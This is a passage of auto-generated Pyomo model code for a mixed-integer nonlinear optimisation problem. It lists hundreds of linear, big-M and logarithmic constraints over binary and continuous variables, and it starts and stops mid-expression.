- m.b836 + m.b841 
<= 0) m.c1258 = Constraint(expr= - m.b837 + m.b841 <= 0) m.c1259 = Constraint(expr= - m.b837 + m.b842 <= 0) m.c1260 = Constraint(expr= - m.b838 + m.b842 <= 0) m.c1261 = Constraint(expr= - m.b836 + m.b843 <= 0) m.c1262 = Constraint(expr= - m.b838 + m.b843 <= 0) m.c1263 = Constraint(expr= - m.b836 + m.b844 <= 0) m.c1264 = Constraint(expr= - m.b837 + m.b844 <= 0) m.c1265 = Constraint(expr= - m.b837 + m.b845 <= 0) m.c1266 = Constraint(expr= - m.b838 + m.b845 <= 0) m.c1267 = Constraint(expr= - m.b836 + m.b846 <= 0) m.c1268 = Constraint(expr= - m.b838 + m.b846 <= 0) m.c1269 = Constraint(expr= - m.b836 + m.b847 <= 0) m.c1270 = Constraint(expr= - m.b837 + m.b847 <= 0) m.c1271 = Constraint(expr= - m.b849 + m.b851 <= 0) m.c1272 = Constraint(expr= - m.b850 + m.b851 <= 0) m.c1273 = Constraint(expr= - m.b848 + m.b852 <= 0) m.c1274 = Constraint(expr= - m.b850 + m.b852 <= 0) m.c1275 = Constraint(expr= - m.b848 + m.b853 <= 0) m.c1276 = Constraint(expr= - m.b849 + m.b853 <= 0) m.c1277 = Constraint(expr= - m.b849 + m.b854 <= 0) m.c1278 = Constraint(expr= - m.b850 + m.b854 <= 0) m.c1279 = Constraint(expr= - m.b848 + m.b855 <= 0) m.c1280 = Constraint(expr= - m.b850 + m.b855 <= 0) m.c1281 = Constraint(expr= - m.b848 + m.b856 <= 0) m.c1282 = Constraint(expr= - m.b849 + m.b856 <= 0) m.c1283 = Constraint(expr= - m.b849 + m.b857 <= 0) m.c1284 = Constraint(expr= - m.b850 + m.b857 <= 0) m.c1285 = Constraint(expr= - m.b848 + m.b858 <= 0) m.c1286 = Constraint(expr= - m.b850 + m.b858 <= 0) m.c1287 = Constraint(expr= - m.b848 + m.b859 <= 0) m.c1288 = Constraint(expr= - m.b849 + m.b859 <= 0) m.c1289 = Constraint(expr= - m.b861 + m.b863 <= 0) m.c1290 = Constraint(expr= - m.b862 + m.b863 <= 0) m.c1291 = Constraint(expr= - m.b860 + m.b864 <= 0) m.c1292 = Constraint(expr= - m.b862 + m.b864 <= 0) m.c1293 = Constraint(expr= - m.b860 + m.b865 <= 0) m.c1294 = Constraint(expr= - m.b861 + m.b865 <= 0) m.c1295 = Constraint(expr= - m.b861 + m.b866 <= 0) m.c1296 = Constraint(expr= - m.b862 + m.b866 <= 0) 
m.c1297 = Constraint(expr= - m.b860 + m.b867 <= 0) m.c1298 = Constraint(expr= - m.b862 + m.b867 <= 0) m.c1299 = Constraint(expr= - m.b860 + m.b868 <= 0) m.c1300 = Constraint(expr= - m.b861 + m.b868 <= 0) m.c1301 = Constraint(expr= - m.b861 + m.b869 <= 0) m.c1302 = Constraint(expr= - m.b862 + m.b869 <= 0) m.c1303 = Constraint(expr= - m.b860 + m.b870 <= 0) m.c1304 = Constraint(expr= - m.b862 + m.b870 <= 0) m.c1305 = Constraint(expr= - m.b860 + m.b871 <= 0) m.c1306 = Constraint(expr= - m.b861 + m.b871 <= 0) m.c1307 = Constraint(expr= - m.b873 + m.b875 <= 0) m.c1308 = Constraint(expr= - m.b874 + m.b875 <= 0) m.c1309 = Constraint(expr= - m.b872 + m.b876 <= 0) m.c1310 = Constraint(expr= - m.b874 + m.b876 <= 0) m.c1311 = Constraint(expr= - m.b872 + m.b877 <= 0) m.c1312 = Constraint(expr= - m.b873 + m.b877 <= 0) m.c1313 = Constraint(expr= - m.b873 + m.b878 <= 0) m.c1314 = Constraint(expr= - m.b874 + m.b878 <= 0) m.c1315 = Constraint(expr= - m.b872 + m.b879 <= 0) m.c1316 = Constraint(expr= - m.b874 + m.b879 <= 0) m.c1317 = Constraint(expr= - m.b872 + m.b880 <= 0) m.c1318 = Constraint(expr= - m.b873 + m.b880 <= 0) m.c1319 = Constraint(expr= - m.b873 + m.b881 <= 0) m.c1320 = Constraint(expr= - m.b874 + m.b881 <= 0) m.c1321 = Constraint(expr= - m.b872 + m.b882 <= 0) m.c1322 = Constraint(expr= - m.b874 + m.b882 <= 0) m.c1323 = Constraint(expr= - m.b872 + m.b883 <= 0) m.c1324 = Constraint(expr= - m.b873 + m.b883 <= 0) m.c1325 = Constraint(expr= - m.b885 + m.b887 <= 0) m.c1326 = Constraint(expr= - m.b886 + m.b887 <= 0) m.c1327 = Constraint(expr= - m.b884 + m.b888 <= 0) m.c1328 = Constraint(expr= - m.b886 + m.b888 <= 0) m.c1329 = Constraint(expr= - m.b884 + m.b889 <= 0) m.c1330 = Constraint(expr= - m.b885 + m.b889 <= 0) m.c1331 = Constraint(expr= - m.b885 + m.b890 <= 0) m.c1332 = Constraint(expr= - m.b886 + m.b890 <= 0) m.c1333 = Constraint(expr= - m.b884 + m.b891 <= 0) m.c1334 = Constraint(expr= - m.b886 + m.b891 <= 0) m.c1335 = Constraint(expr= - m.b884 + m.b892 <= 0) m.c1336 = 
Constraint(expr= - m.b885 + m.b892 <= 0) m.c1337 = Constraint(expr= - m.b885 + m.b893 <= 0) m.c1338 = Constraint(expr= - m.b886 + m.b893 <= 0) m.c1339 = Constraint(expr= - m.b884 + m.b894 <= 0) m.c1340 = Constraint(expr= - m.b886 + m.b894 <= 0) m.c1341 = Constraint(expr= - m.b884 + m.b895 <= 0) m.c1342 = Constraint(expr= - m.b885 + m.b895 <= 0) m.c1343 = Constraint(expr= m.b704 - m.b800 <= 0) m.c1344 = Constraint(expr= m.b705 - m.b801 <= 0) m.c1345 = Constraint(expr= m.b706 - m.b802 <= 0) m.c1346 = Constraint(expr= m.b716 - m.b812 <= 0) m.c1347 = Constraint(expr= m.b717 - m.b813 <= 0) m.c1348 = Constraint(expr= m.b718 - m.b814 <= 0) m.c1349 = Constraint(expr= m.b728 - m.b824 <= 0) m.c1350 = Constraint(expr= m.b729 - m.b825 <= 0) m.c1351 = Constraint(expr= m.b730 - m.b826 <= 0) m.c1352 = Constraint(expr= m.b740 - m.b836 <= 0) m.c1353 = Constraint(expr= m.b741 - m.b837 <= 0) m.c1354 = Constraint(expr= m.b742 - m.b838 <= 0) m.c1355 = Constraint(expr= m.b752 - m.b848 <= 0) m.c1356 = Constraint(expr= m.b753 - m.b849 <= 0) m.c1357 = Constraint(expr= m.b754 - m.b850 <= 0) m.c1358 = Constraint(expr= m.b764 - m.b860 <= 0) m.c1359 = Constraint(expr= m.b765 - m.b861 <= 0) m.c1360 = Constraint(expr= m.b766 - m.b862 <= 0) m.c1361 = Constraint(expr= m.b776 - m.b872 <= 0) m.c1362 = Constraint(expr= m.b777 - m.b873 <= 0) m.c1363 = Constraint(expr= m.b778 - m.b874 <= 0) m.c1364 = Constraint(expr= m.b788 - m.b884 <= 0) m.c1365 = Constraint(expr= m.b789 - m.b885 <= 0) m.c1366 = Constraint(expr= m.b790 - m.b886 <= 0) m.c1367 = Constraint(expr= m.b707 - m.b803 <= 0) m.c1368 = Constraint(expr= - m.b707 + m.b708 - m.b804 <= 0) m.c1369 = Constraint(expr= - m.b707 - m.b708 + m.b709 - m.b805 <= 0) m.c1370 = Constraint(expr= m.b710 - m.b806 <= 0) m.c1371 = Constraint(expr= - m.b710 + m.b711 - m.b807 <= 0) m.c1372 = Constraint(expr= - m.b710 - m.b711 + m.b712 - m.b808 <= 0) m.c1373 = Constraint(expr= m.b713 - m.b809 <= 0) m.c1374 = Constraint(expr= - m.b713 + m.b714 - m.b810 <= 0) m.c1375 = 
Constraint(expr= - m.b713 - m.b714 + m.b715 - m.b811 <= 0) m.c1376 = Constraint(expr= m.b719 - m.b815 <= 0) m.c1377 = Constraint(expr= - m.b719 + m.b720 - m.b816 <= 0) m.c1378 = Constraint(expr= - m.b719 - m.b720 + m.b721 - m.b817 <= 0) m.c1379 = Constraint(expr= m.b722 - m.b818 <= 0) m.c1380 = Constraint(expr= - m.b722 + m.b723 - m.b819 <= 0) m.c1381 = Constraint(expr= - m.b722 - m.b723 + m.b724 - m.b820 <= 0) m.c1382 = Constraint(expr= m.b725 - m.b821 <= 0) m.c1383 = Constraint(expr= - m.b725 + m.b726 - m.b822 <= 0) m.c1384 = Constraint(expr= - m.b725 - m.b726 + m.b727 - m.b823 <= 0) m.c1385 = Constraint(expr= m.b731 - m.b827 <= 0) m.c1386 = Constraint(expr= - m.b731 + m.b732 - m.b828 <= 0) m.c1387 = Constraint(expr= - m.b731 - m.b732 + m.b733 - m.b829 <= 0) m.c1388 = Constraint(expr= m.b734 - m.b830 <= 0) m.c1389 = Constraint(expr= - m.b734 + m.b735 - m.b831 <= 0) m.c1390 = Constraint(expr= - m.b734 - m.b735 + m.b736 - m.b832 <= 0) m.c1391 = Constraint(expr= m.b737 - m.b833 <= 0) m.c1392 = Constraint(expr= - m.b737 + m.b738 - m.b834 <= 0) m.c1393 = Constraint(expr= - m.b737 - m.b738 + m.b739 - m.b835 <= 0) m.c1394 = Constraint(expr= m.b743 - m.b839 <= 0) m.c1395 = Constraint(expr= - m.b743 + m.b744 - m.b840 <= 0) m.c1396 = Constraint(expr= - m.b743 - m.b744 + m.b745 - m.b841 <= 0) m.c1397 = Constraint(expr= m.b746 - m.b842 <= 0) m.c1398 = Constraint(expr= - m.b746 + m.b747 - m.b843 <= 0) m.c1399 = Constraint(expr= - m.b746 - m.b747 + m.b748 - m.b844 <= 0) m.c1400 = Constraint(expr= m.b749 - m.b845 <= 0) m.c1401 = Constraint(expr= - m.b749 + m.b750 - m.b846 <= 0) m.c1402 = Constraint(expr= - m.b749 - m.b750 + m.b751 - m.b847 <= 0) m.c1403 = Constraint(expr= m.b755 - m.b851 <= 0) m.c1404 = Constraint(expr= - m.b755 + m.b756 - m.b852 <= 0) m.c1405 = Constraint(expr= - m.b755 - m.b756 + m.b757 - m.b853 <= 0) m.c1406 = Constraint(expr= m.b758 - m.b854 <= 0) m.c1407 = Constraint(expr= - m.b758 + m.b759 - m.b855 <= 0) m.c1408 = Constraint(expr= - m.b758 - m.b759 + 
m.b760 - m.b856 <= 0) m.c1409 = Constraint(expr= m.b761 - m.b857 <= 0) m.c1410 = Constraint(expr= - m.b761 + m.b762 - m.b858 <= 0) m.c1411 = Constraint(expr= - m.b761 - m.b762 + m.b763 - m.b859 <= 0) m.c1412 = Constraint(expr= m.b767 - m.b863 <= 0) m.c1413 = Constraint(expr= - m.b767 + m.b768 - m.b864 <= 0) m.c1414 = Constraint(expr= - m.b767 - m.b768 + m.b769 - m.b865 <= 0) m.c1415 = Constraint(expr= m.b770 - m.b866 <= 0) m.c1416 = Constraint(expr= - m.b770 + m.b771 - m.b867 <= 0) m.c1417 = Constraint(expr= - m.b770 - m.b771 + m.b772 - m.b868 <= 0) m.c1418 = Constraint(expr= m.b773 - m.b869 <= 0) m.c1419 = Constraint(expr= - m.b773 + m.b774 - m.b870 <= 0) m.c1420 = Constraint(expr= - m.b773 - m.b774 + m.b775 - m.b871 <= 0) m.c1421 = Constraint(expr= m.b779 - m.b875 <= 0) m.c1422 = Constraint(expr= - m.b779 + m.b780 - m.b876 <= 0) m.c1423 = Constraint(expr= - m.b779 - m.b780 + m.b781 - m.b877 <= 0) m.c1424 = Constraint(expr= m.b782 - m.b878 <= 0) m.c1425 = Constraint(expr= - m.b782 + m.b783 - m.b879 <= 0) m.c1426 = Constraint(expr= - m.b782 - m.b783 + m.b784 - m.b880 <= 0) m.c1427 = Constraint(expr= m.b785 - m.b881 <= 0) m.c1428 = Constraint(expr= - m.b785 + m.b786 - m.b882 <= 0) m.c1429 = Constraint(expr= - m.b785 - m.b786 + m.b787 - m.b883 <= 0) m.c1430 = Constraint(expr= m.b791 - m.b887 <= 0) m.c1431 = Constraint(expr= - m.b791 + m.b792 - m.b888 <= 0) m.c1432 = Constraint(expr= - m.b791 - m.b792 + m.b793 - m.b889 <= 0) m.c1433 = Constraint(expr= m.b794 - m.b890 <= 0) m.c1434 = Constraint(expr= - m.b794 + m.b795 - m.b891 <= 0) m.c1435 = Constraint(expr= - m.b794 - m.b795 + m.b796 - m.b892 <= 0) m.c1436 = Constraint(expr= m.b797 - m.b893 <= 0) m.c1437 = Constraint(expr= - m.b797 + m.b798 - m.b894 <= 0) m.c1438 = Constraint(expr= - m.b797 - m.b798 + m.b799 - m.b895 <= 0) m.c1439 = Constraint(expr= m.x14 - m.x95 - m.x896 == 0) m.c1440 = Constraint(expr= m.x15 - m.x96 - m.x897 == 0) m.c1441 = Constraint(expr= m.x16 - m.x97 - m.x898 == 0) m.c1442 = Constraint(expr= 
m.x26 - m.x98 - m.x929 == 0) m.c1443 = Constraint(expr= m.x27 - m.x99 - m.x930 == 0) m.c1444 = Constraint(expr= m.x28 - m.x100 - m.x931 == 0) m.c1445 = Constraint(expr= m.x59 - m.x101 - m.x980 == 0) m.c1446 = Constraint(expr= m.x60 - m.x102 - m.x981 == 0) m.c1447 = Constraint(expr= m.x61 - m.x103 - m.x982 == 0) m.c1448 = Constraint(expr= m.x62 - m.x104 - m.x983 == 0) m.c1449 = Constraint(expr= m.x63 - m.x105 - m.x984 == 0) m.c1450 = Constraint(expr= m.x64 - m.x106 - m.x985 == 0) m.c1451 = Constraint(expr= m.x896 - m.x899 - m.x902 == 0) m.c1452 = Constraint(expr= m.x897 - m.x900 - m.x903 == 0) m.c1453 = Constraint(expr= m.x898 - m.x901 - m.x904 == 0) m.c1454 = Constraint(expr= - m.x905 - m.x908 + m.x911 == 0) m.c1455 = Constraint(expr= - m.x906 - m.x909 + m.x912 == 0) m.c1456 = Constraint(expr= - m.x907 - m.x910 + m.x913 == 0) m.c1457 = Constraint(expr= m.x911 - m.x914 - m.x917 == 0) m.c1458 = Constraint(expr= m.x912 - m.x915 - m.x918 == 0) m.c1459 = Constraint(expr= m.x913 - m.x916 - m.x919 == 0) m.c1460 = Constraint(expr= m.x917 - m.x920 - m.x923 - m.x926 == 0) m.c1461 = Constraint(expr= m.x918 - m.x921 - m.x924 - m.x927 == 0) m.c1462 = Constraint(expr= m.x919 - m.x922 - m.x925 - m.x928 == 0) m.c1463 = Constraint(expr= m.x932 - m.x941 - m.x944 == 0) m.c1464 = Constraint(expr= m.x933 - m.x942 - m.x945 == 0) m.c1465 = Constraint(expr= m.x934 - m.x943 - m.x946 == 0) m.c1466 = Constraint(expr= m.x938 - m.x947 - m.x950 - m.x953 == 0) m.c1467 = Constraint(expr= m.x939 - m.x948 - m.x951 - m.x954 == 0) m.c1468 = Constraint(expr= m.x940 - m.x949 - m.x952 - m.x955 == 0) m.c1469 = Constraint(expr= m.x962 - m.x974 - m.x977 == 0) m.c1470 = Constraint(expr= m.x963 - m.x975 - m.x978 == 0) m.c1471 = Constraint(expr= m.x964 - m.x976 - m.x979 == 0) m.c1472 = Constraint(expr= - m.x965 - m.x983 + m.x986 == 0) m.c1473 = Constraint(expr= - m.x966 - m.x984 + m.x987 == 0) m.c1474 = Constraint(expr= - m.x967 - m.x985 + m.x988 == 0) m.c1475 = Constraint(expr= m.x968 - m.x989 - m.x992 == 0) 
m.c1476 = Constraint(expr= m.x969 - m.x990 - m.x993 == 0) m.c1477 = Constraint(expr= m.x970 - m.x991 - m.x994 == 0) m.c1478 = Constraint(expr= m.x971 - m.x995 - m.x998 - m.x1001 == 0) m.c1479 = Constraint(expr= m.x972 - m.x996 - m.x999 - m.x1002 == 0) m.c1480 = Constraint(expr= m.x973 - m.x997 - m.x1000 - m.x1003 == 0) m.c1481 = Constraint(expr= m.x1028 - m.x1031 == 0) m.c1482 = Constraint(expr= m.x1029 - m.x1032 == 0) m.c1483 = Constraint(expr= m.x1030 - m.x1033 == 0) m.c1484 = Constraint(expr= m.x1031 - m.x1034 - m.x1037 == 0) m.c1485 = Constraint(expr= m.x1032 - m.x1035 - m.x1038 == 0) m.c1486 = Constraint(expr= m.x1033 - m.x1036 - m.x1039 == 0) m.c1487 = Constraint(expr= - m.x1040 - m.x1043 + m.x1046 == 0) m.c1488 = Constraint(expr= - m.x1041 - m.x1044 + m.x1047 == 0) m.c1489 = Constraint(expr= - m.x1042 - m.x1045 + m.x1048 == 0) m.c1490 = Constraint(expr= m.x1046 - m.x1049 - m.x1052 == 0) m.c1491 = Constraint(expr= m.x1047 - m.x1050 - m.x1053 == 0) m.c1492 = Constraint(expr= m.x1048 - m.x1051 - m.x1054 == 0) m.c1493 = Constraint(expr= m.x1052 - m.x1055 - m.x1058 - m.x1061 == 0) m.c1494 = Constraint(expr= m.x1053 - m.x1056 - m.x1059 - m.x1062 == 0) m.c1495 = Constraint(expr= m.x1054 - m.x1057 - m.x1060 - m.x1063 == 0) m.c1496 = Constraint(expr= m.x1067 - m.x1076 - m.x1079 == 0) m.c1497 = Constraint(expr= m.x1068 - m.x1077 - m.x1080 == 0) m.c1498 = Constraint(expr= m.x1069 - m.x1078 - m.x1081 == 0) m.c1499 = Constraint(expr= m.x1073 - m.x1082 - m.x1085 - m.x1088 == 0) m.c1500 = Constraint(expr= m.x1074 - m.x1083 - m.x1086 - m.x1089 == 0) m.c1501 = Constraint(expr= m.x1075 - m.x1084 - m.x1087 - m.x1090 == 0) m.c1502 = Constraint(expr=(m.x1118/(0.001 + 0.999*m.b1490) - log(1 + m.x1106/(0.001 + 0.999*m.b1490)))*(0.001 + 0.999* m.b1490) <= 0) m.c1503 = Constraint(expr=(m.x1119/(0.001 + 0.999*m.b1491) - log(1 + m.x1107/(0.001 + 0.999*m.b1491)))*(0.001 + 0.999* m.b1491) <= 0) m.c1504 = Constraint(expr=(m.x1120/(0.001 + 0.999*m.b1492) - log(1 + m.x1108/(0.001 + 
0.999*m.b1492)))*(0.001 + 0.999* m.b1492) <= 0) m.c1505 = Constraint(expr= m.x1109 == 0) m.c1506 = Constraint(expr= m.x1110 == 0) m.c1507 = Constraint(expr= m.x1111 == 0) m.c1508 = Constraint(expr= m.x1121 == 0) m.c1509 = Constraint(expr= m.x1122 == 0) m.c1510 = Constraint(expr= m.x1123 == 0) m.c1511 = Constraint(expr= m.x899 - m.x1106 - m.x1109 == 0) m.c1512 = Constraint(expr= m.x900 - m.x1107 - m.x1110 == 0) m.c1513 = Constraint(expr= m.x901 - m.x1108 - m.x1111 == 0) m.c1514 = Constraint(expr= m.x905 - m.x1118 - m.x1121 == 0) m.c1515 = Constraint(expr= m.x906 - m.x1119 - m.x1122 == 0) m.c1516 = Constraint(expr= m.x907 - m.x1120 - m.x1123 == 0) m.c1517 = Constraint(expr= m.x1106 - 40*m.b1490 <= 0) m.c1518 = Constraint(expr= m.x1107 - 40*m.b1491 <= 0) m.c1519 = Constraint(expr= m.x1108 - 40*m.b1492 <= 0) m.c1520 = Constraint(expr= m.x1109 + 40*m.b1490 <= 40) m.c1521 = Constraint(expr= m.x1110 + 40*m.b1491 <= 40) m.c1522 = Constraint(expr= m.x1111 + 40*m.b1492 <= 40) m.c1523 = Constraint(expr= m.x1118 - 3.71357206670431*m.b1490 <= 0) m.c1524 = Constraint(expr= m.x1119 - 3.71357206670431*m.b1491 <= 0) m.c1525 = Constraint(expr= m.x1120 - 3.71357206670431*m.b1492 <= 0) m.c1526 = Constraint(expr= m.x1121 + 3.71357206670431*m.b1490 <= 3.71357206670431) m.c1527 = Constraint(expr= m.x1122 + 3.71357206670431*m.b1491 <= 3.71357206670431) m.c1528 = Constraint(expr= m.x1123 + 3.71357206670431*m.b1492 <= 3.71357206670431) m.c1529 = Constraint(expr=(m.x1124/(0.001 + 0.999*m.b1493) - 1.2*log(1 + m.x1112/(0.001 + 0.999*m.b1493)))*(0.001 + 0.999*m.b1493) <= 0) m.c1530 = Constraint(expr=(m.x1125/(0.001 + 0.999*m.b1494) - 1.2*log(1 + m.x1113/(0.001 + 0.999*m.b1494)))*(0.001 + 0.999*m.b1494) <= 0) m.c1531 = Constraint(expr=(m.x1126/(0.001 + 0.999*m.b1495) - 1.2*log(1 + m.x1114/(0.001 + 0.999*m.b1495)))*(0.001 + 0.999*m.b1495) <= 0) m.c1532 = Constraint(expr= m.x1115 == 0) m.c1533 = Constraint(expr= m.x1116 == 0) m.c1534 = Constraint(expr= m.x1117 == 0) m.c1535 = Constraint(expr= 
m.x1127 == 0) m.c1536 = Constraint(expr= m.x1128 == 0) m.c1537 = Constraint(expr= m.x1129 == 0) m.c1538 = Constraint(expr= m.x902 - m.x1112 - m.x1115 == 0) m.c1539 = Constraint(expr= m.x903 - m.x1113 - m.x1116 == 0) m.c1540 = Constraint(expr= m.x904 - m.x1114 - m.x1117 == 0) m.c1541 = Constraint(expr= m.x908 - m.x1124 - m.x1127 == 0) m.c1542 = Constraint(expr= m.x909 - m.x1125 - m.x1128 == 0) m.c1543 = Constraint(expr= m.x910 - m.x1126 - m.x1129 == 0) m.c1544 = Constraint(expr= m.x1112 - 40*m.b1493 <= 0) m.c1545 = Constraint(expr= m.x1113 - 40*m.b1494 <= 0) m.c1546 = Constraint(expr= m.x1114 - 40*m.b1495 <= 0) m.c1547 = Constraint(expr= m.x1115 + 40*m.b1493 <= 40) m.c1548 = Constraint(expr= m.x1116 + 40*m.b1494 <= 40) m.c1549 = Constraint(expr= m.x1117 + 40*m.b1495 <= 40) m.c1550 = Constraint(expr= m.x1124 - 4.45628648004517*m.b1493 <= 0) m.c1551 = Constraint(expr= m.x1125 - 4.45628648004517*m.b1494 <= 0) m.c1552 = Constraint(expr= m.x1126 - 4.45628648004517*m.b1495 <= 0) m.c1553 = Constraint(expr= m.x1127 + 4.45628648004517*m.b1493 <= 4.45628648004517) m.c1554 = Constraint(expr= m.x1128 + 4.45628648004517*m.b1494 <= 4.45628648004517) m.c1555 = Constraint(expr= m.x1129 + 4.45628648004517*m.b1495 <= 4.45628648004517) m.c1556 = Constraint(expr= - 0.75*m.x1130 + m.x1154 == 0) m.c1557 = Constraint(expr= - 0.75*m.x1131 + m.x1155 == 0) m.c1558 = Constraint(expr= - 0.75*m.x1132 + m.x1156 == 0) m.c1559 = Constraint(expr= m.x1133 == 0) m.c1560 = Constraint(expr= m.x1134 == 0) m.c1561 = Constraint(expr= m.x1135 == 0) m.c1562 = Constraint(expr= m.x1157 == 0) m.c1563 = Constraint(expr= m.x1158 == 0) m.c1564 = Constraint(expr= m.x1159 == 0) m.c1565 = Constraint(expr= m.x920 - m.x1130 - m.x1133 == 0) m.c1566 = Constraint(expr= m.x921 - m.x1131 - m.x1134 == 0) m.c1567 = Constraint(expr= m.x922 - m.x1132 - m.x1135 == 0) m.c1568 = Constraint(expr= m.x932 - m.x1154 - m.x1157 == 0) m.c1569 = Constraint(expr= m.x933 - m.x1155 - m.x1158 == 0) m.c1570 = Constraint(expr= m.x934 - m.x1156 
- m.x1159 == 0) m.c1571 = Constraint(expr= m.x1130 - 4.45628648004517*m.b1496 <= 0) m.c1572 = Constraint(expr= m.x1131 - 4.45628648004517*m.b1497 <= 0) m.c1573 = Constraint(expr= m.x1132 - 4.45628648004517*m.b1498 <= 0) m.c1574 = Constraint(expr= m.x1133 + 4.45628648004517*m.b1496 <= 4.45628648004517) m.c1575 = Constraint(expr= m.x1134 + 4.45628648004517*m.b1497 <= 4.45628648004517) m.c1576 = Constraint(expr= m.x1135 + 4.45628648004517*m.b1498 <= 4.45628648004517) m.c1577 = Constraint(expr= m.x1154 - 3.34221486003388*m.b1496 <= 0) m.c1578 = Constraint(expr= m.x1155 - 3.34221486003388*m.b1497 <= 0) m.c1579 = Constraint(expr= m.x1156 - 3.34221486003388*m.b1498 <= 0) m.c1580 = Constraint(expr= m.x1157 + 3.34221486003388*m.b1496 <= 3.34221486003388) m.c1581 = Constraint(expr= m.x1158 + 3.34221486003388*m.b1497 <= 3.34221486003388) m.c1582 = Constraint(expr= m.x1159 + 3.34221486003388*m.b1498 <= 3.34221486003388) m.c1583 = Constraint(expr=(m.x1160/(0.001 + 0.999*m.b1499) - 1.5*log(1 + m.x1136/(0.001 + 0.999*m.b1499)))*(0.001 + 0.999*m.b1499) <= 0) m.c1584 = Constraint(expr=(m.x1161/(0.001 + 0.999*m.b1500) - 1.5*log(1 + m.x1137/(0.001 + 0.999*m.b1500)))*(0.001 + 0.999*m.b1500) <= 0) m.c1585 = Constraint(expr=(m.x1162/(0.001 + 0.999*m.b1501) - 1.5*log(1 + m.x1138/(0.001 + 0.999*m.b1501)))*(0.001 + 0.999*m.b1501) <= 0) m.c1586 = Constraint(expr= m.x1139 == 0) m.c1587 = Constraint(expr= m.x1140 == 0) m.c1588 = Constraint(expr= m.x1141 == 0) m.c1589 = Constraint(expr= m.x1166 == 0) m.c1590 = Constraint(expr= m.x1167 == 0) m.c1591 = Constraint(expr= m.x1168 == 0) m.c1592 = Constraint(expr= m.x923 - m.x1136 - m.x1139 == 0) m.c1593 = Constraint(expr= m.x924 - m.x1137 - m.x1140 == 0) m.c1594 = Constraint(expr= m.x925 - m.x1138 - m.x1141 == 0) m.c1595 = Constraint(expr= m.x935 - m.x1160 - m.x1166 == 0) m.c1596 = Constraint(expr= m.x936 - m.x1161 - m.x1167 == 0) m.c1597 = Constraint(expr= m.x937 - m.x1162 - m.x1168 == 0) m.c1598 = Constraint(expr= m.x1136 - 
4.45628648004517*m.b1499 <= 0) m.c1599 = Constraint(expr= m.x1137 - 4.45628648004517*m.b1500 <= 0) m.c1600 = Constraint(expr= m.x1138 - 4.45628648004517*m.b1501 <= 0) m.c1601 = Constraint(expr= m.x1139 + 4.45628648004517*m.b1499 <= 4.45628648004517) m.c1602 = Constraint(expr= m.x1140 + 4.45628648004517*m.b1500 <= 4.45628648004517) m.c1603 = Constraint(expr= m.x1141 + 4.45628648004517*m.b1501 <= 4.45628648004517) m.c1604 = Constraint(expr= m.x1160 - 2.54515263975353*m.b1499 <= 0) m.c1605 = Constraint(expr= m.x1161 - 2.54515263975353*m.b1500 <= 0) m.c1606 = Constraint(expr= m.x1162 - 2.54515263975353*m.b1501 <= 0) m.c1607 = Constraint(expr= m.x1166 + 2.54515263975353*m.b1499 <= 2.54515263975353) m.c1608 = Constraint(expr= m.x1167 + 2.54515263975353*m.b1500 <= 2.54515263975353) m.c1609 = Constraint(expr= m.x1168 + 2.54515263975353*m.b1501 <= 2.54515263975353) m.c1610 = Constraint(expr= - m.x1142 + m.x1172 == 0) m.c1611 = Constraint(expr= - m.x1143 + m.x1173 == 0) m.c1612 = Constraint(expr= - m.x1144 + m.x1174 == 0) m.c1613 = Constraint(expr= - 0.5*m.x1148 + m.x1172 == 0) m.c1614 = Constraint(expr= - 0.5*m.x1149 + m.x1173 == 0) m.c1615 = Constraint(expr= - 0.5*m.x1150 + m.x1174 == 0) m.c1616 = Constraint(expr= m.x1145 == 0) m.c1617 = Constraint(expr= m.x1146 == 0) m.c1618 = Constraint(expr= m.x1147 == 0) m.c1619 = Constraint(expr= m.x1151 == 0) m.c1620 = Constraint(expr= m.x1152 == 0) m.c1621 = Constraint(expr= m.x1153 == 0) m.c1622 = Constraint(expr= m.x1175 == 0) m.c1623 = Constraint(expr= m.x1176 == 0) m.c1624 = Constraint(expr= m.x1177 == 0) m.c1625 = Constraint(expr= m.x926 - m.x1142 - m.x1145 == 0) m.c1626 = Constraint(expr= m.x927 - m.x1143 - m.x1146 == 0) m.c1627 = Constraint(expr= m.x928 - m.x1144 - m.x1147 == 0) m.c1628 = Constraint(expr= m.x929 - m.x1148 - m.x1151 == 0) m.c1629 = Constraint(expr= m.x930 - m.x1149 - m.x1152 == 0) m.c1630 = Constraint(expr= m.x931 - m.x1150 - m.x1153 == 0) m.c1631 = Constraint(expr= m.x938 - m.x1172 - m.x1175 == 0) m.c1632 = 
Constraint(expr= m.x939 - m.x1173 - m.x1176 == 0) m.c1633 = Constraint(expr= m.x940 - m.x1174 - m.x1177 == 0) m.c1634 = Constraint(expr= m.x1142 - 4.45628648004517*m.b1502 <= 0) m.c1635 = Constraint(expr= m.x1143 - 4.45628648004517*m.b1503 <= 0) m.c1636 = Constraint(expr= m.x1144 - 4.45628648004517*m.b1504 <= 0) m.c1637 = Constraint(expr= m.x1145 + 4.45628648004517*m.b1502 <= 4.45628648004517) m.c1638 = Constraint(expr= m.x1146 + 4.45628648004517*m.b1503 <= 4.45628648004517) m.c1639 = Constraint(expr= m.x1147 + 4.45628648004517*m.b1504 <= 4.45628648004517) m.c1640 = Constraint(expr= m.x1148 - 30*m.b1502 <= 0) m.c1641 = Constraint(expr= m.x1149 - 30*m.b1503 <= 0) m.c1642 = Constraint(expr= m.x1150 - 30*m.b1504 <= 0) m.c1643 = Constraint(expr= m.x1151 + 30*m.b1502 <= 30) m.c1644 = Constraint(expr= m.x1152 + 30*m.b1503 <= 30) m.c1645 = Constraint(expr= m.x1153 + 30*m.b1504 <= 30) m.c1646 = Constraint(expr= m.x1172 - 15*m.b1502 <= 0) m.c1647 = Constraint(expr= m.x1173 - 15*m.b1503 <= 0) m.c1648 = Constraint(expr= m.x1174 - 15*m.b1504 <= 0) m.c1649 = Constraint(expr= m.x1175 + 15*m.b1502 <= 15) m.c1650 = Constraint(expr= m.x1176 + 15*m.b1503 <= 15) m.c1651 = Constraint(expr= m.x1177 + 15*m.b1504 <= 15) m.c1652 = Constraint(expr=(m.x1208/(0.001 + 0.999*m.b1505) - 1.25*log(1 + m.x1178/(0.001 + 0.999*m.b1505)))*(0.001 + 0.999*m.b1505) <= 0) m.c1653 = Constraint(expr=(m.x1209/(0.001 + 0.999*m.b1506) - 1.25*log(1 + m.x1179/(0.001 + 0.999*m.b1506)))*(0.001 + 0.999*m.b1506) <= 0) m.c1654 = Constraint(expr=(m.x1210/(0.001 + 0.999*m.b1507) - 1.25*log(1 + m.x1180/(0.001 + 0.999*m.b1507)))*(0.001 + 0.999*m.b1507) <= 0) m.c1655 = Constraint(expr= m.x1181 == 0) m.c1656 = Constraint(expr= m.x1182 == 0) m.c1657 = 